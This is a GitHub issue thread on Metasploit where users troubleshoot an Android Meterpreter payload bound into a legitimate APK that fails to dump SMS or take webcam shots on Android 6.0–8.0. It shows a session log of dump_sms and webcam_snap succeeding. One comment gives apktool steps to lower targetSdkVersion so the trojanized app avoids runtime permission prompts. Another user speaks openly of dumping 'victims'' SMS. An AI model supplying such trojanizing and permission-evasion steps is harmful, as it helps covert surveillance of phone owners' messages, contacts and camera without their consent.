### ISSUE TITLE
Could not use command like webcam snap dump sms on android 6.0  > 8.0

### ISSUE THREAD

**Issue by jmpkali** [rapid7/metasploit-framework#9397]
hello,i have some problem when tested on android 6.0 > 8.0..i could not dump sms or use webcam snap  when do testing on android 6.0 >8.0..  on android 4.0 < 5.5 it work fine all commands can use..i have compare with spynote rat in spynote it work fine on android 6.0 > 8.0..i bind the payload on original apk

os i use Kali linux

**Comment by mechaadi** [comment]
did u find any solution yet?

**Comment by jmpkali** [comment]
nope..i could not find any solution

**Comment by timwr** [comment]
```
meterpreter > sysinfo
Computer    : localhost
OS          : Android 7.1.2 - Linux 3.10.73-gd79f9df7e45e (aarch64)
Meterpreter : dalvik/android
meterpreter > dump_sms
[*] Fetching 9 sms messages
[*] SMS messages saved to: sms_dump_20180518200523.txt
meterpreter > webcam_snap -i 2
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: ...
```
I suspect this is related to: https://github.com/rapid7/metasploit-framework/issues/10033
I can't reproduce this on a non injected apk.

Presumably this occurs if you inject into an APK targetting 6.0 and above, as it does not request runtime permissions?

**Comment by mechaadi** [comment]
I found a solution guys, you can check there : ) #10033

**Comment by iy0205** [comment]
I found the answer, just decode apk with apktool and modify these values : {_targetSdkVersion: '17'_} in **_apktool.yml_** and set _android:compileSdkVersion="23"_ and _platformBuildVersionCode="23"_ in **_AndroidManifest.xml_**: line 1 which starts with "**<?xml**" if you can't find them, don't add it.
and compile and jarsign

**Comment by aalpaydin** [comment]
> I found the answer, just decode apk with apktool and modify these values : {_targetSdkVersion: '17'_} in **_apktool.yml_** and set _android:compileSdkVersion="23"_ in **_AndroidManifest.xml_** where line 1 in tag if you can't find them, add it.
> and compile and jarsign

Not worked for me. After decompiling, modifiying files as described and compiling back into apk the installation process on android phone is broken. 
Got Error Message from installer:
The package is obviously damaged

**Comment by aalpaydin** [comment]
So the commands (dump_sms, dump_contacts, ....) still are not working with meterpreter.

**Comment by azamet90** [comment]
> I found a solution guys, you can check there : ) #10033

every command working after this?

**Comment by Ajey1** [comment]
I can't able to dumb recent sms of victims
